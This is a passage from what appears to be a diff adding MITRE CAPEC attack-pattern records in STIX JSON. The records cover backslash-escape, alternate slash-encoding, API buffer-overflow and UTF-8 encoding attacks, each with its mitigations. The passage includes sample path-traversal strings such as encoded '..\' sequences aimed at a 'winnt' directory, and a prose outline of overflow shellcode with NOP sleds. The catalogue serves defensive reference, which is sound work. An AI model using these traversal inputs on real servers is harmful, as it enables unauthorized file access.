File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

  2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", + "id": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cb4ae43-cf9a-40ac-a774-6c54684220cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18db8c39-5734-4976-995e-2b41058357e4", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding.", + "id": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c87e3a8c-ff00-48c7-8fc7-287c0608ac1d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expressions can be used to filter out backslash. 
Make sure you decode before filtering and validating the untrusted input data.", + "id": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--91ab6a50-36a5-4861-85ce-aac5a6c7af09", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. 
Do not allow users to access directories/files that they should not access.", + "id": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12c4ce97-d297-42dc-a8bc-b477e5c4bffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f3d2ae6-65d1-4164-a0e0-b2c4925961ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid making decisions based on names of resources (e.g. 
files) if those resources can have alternate names.", + "id": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--937e412f-6548-4f31-b652-45f3f5510579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "spec_version": "2.1", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. 
The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", + "external_references": [ + { + "external_id": "CAPEC-79", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + } + ], + "id": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. 
Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and looks for areas where user input is used to access resources on the target host. The adversary attempts different encodings of slash characters to bypass input filters.

  2. Techniques
    Try both backslash and forward slash characters
    Try different encodings for slash characters such as %5C

Exploit

  1. Traverse application directories: Once the adversary determines how to bypass filters that filter out slash characters, they will manipulate the user input to include slashes in order to traverse directories and access resources that are not intended for the user.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application server accepts paths to locate resources.", + "The application server does insufficient input data validation on the resource path requested by the user.", + "The access right to resources are not set properly." + ], + "x_capec_skills_required": { + "Low": "An adversary can try variation of the slashes characters.", + "Medium": "An adversary can use more sophisticated tool or script to scan a website and find a path filtering problem." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. 
Refer to the RFCs to safely decode URL.", + "id": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a6ee85d-1fc3-4c89-a197-b17473b215bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)", + "id": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-2", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70f70a7f-5a5f-479e-ba10-554afaad269a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cfb918e7-7635-4a23-aa5e-27a2f7619338", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77731bb0-70b0-41b9-8671-78db70983fae", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test your path decoding process against malicious input.", + "id": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a701d96e-611d-4d01-988e-216e7c28a1a3", + "modified": 
"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--04ee0d8b-40e5-4e69-8703-8e5db18aa617", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--83e41edb-f3d5-444b-b2a9-55f1329f2b68", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the application based on the requirements specifications. 
Input that does not match against the allowlist should not be permitted to enter into the system.", + "id": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d18cc586-8a23-43d4-b493-6352b03b104a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--832594fc-7b68-4057-b3f1-8bda4098d788", + "spec_version": "2.1", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets libraries or shared code modules which are vulnerable to buffer overflow attacks. An adversary who has knowledge of known vulnerable libraries or shared code can easily target software that makes use of these libraries. All clients that make use of the code library thus become vulnerable by association. 
This has a very broad effect on security across a system, usually affecting more than one software process.", + "external_references": [ + { + "external_id": "CAPEC-8", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/8.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-118", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/118.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-680", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-733", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/733.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Buffer Overflow in an API Call", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Libc in FreeBSD\n A buffer overflow in the FreeBSD utility setlocale (found in the libc module) puts many programs at risk all at once.\n ", + "\n Xtlib\n A buffer overflow in the Xt library of the X windowing system allows local users to execute commands with root privileges.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary, with knowledge of vulnerable libraries or shared code modules, identifies a target application or program that makes use of these.

Experiment

  1. Find injection vector: The adversary attempts to use the API, and if they can they send a large amount of data to see if the buffer overflow attack really does work.

  2. Techniques
    Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.
  3. Craft overflow content: The adversary crafts the content to be injected based on their knowledge of the vulnerability and their desired outcome. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries' choosing which points to code injected by the adversary.

  4. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the API as the injection vector, the adversary injects the crafted overflow content into the buffer.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host exposes an API to the user.", + "One or more API functions exposed by the target host has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.", + "Low": "An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1904d522-3156-4b2b-8861-ea295dd3490b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--948df80a-6252-4723-93a8-9c5b1a9daa17", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5549f741-7e5e-4f04-86bd-90dceb9c0de9", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f52fdeab-0159-4aa3-aed5-3de1e3f31e4a", + 
"modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07b3e24d-8000-4c35-881d-2eaae3f2411e", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23598190-f719-4176-baf5-1e00d32e9cec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa5f5375-154b-486b-a60c-7eadb33e0a4f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "spec_version": "2.1", + "target_ref": "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. 
UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the \"shortest possible\" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.", + "external_references": [ + { + "external_id": "CAPEC-80", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/80.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": 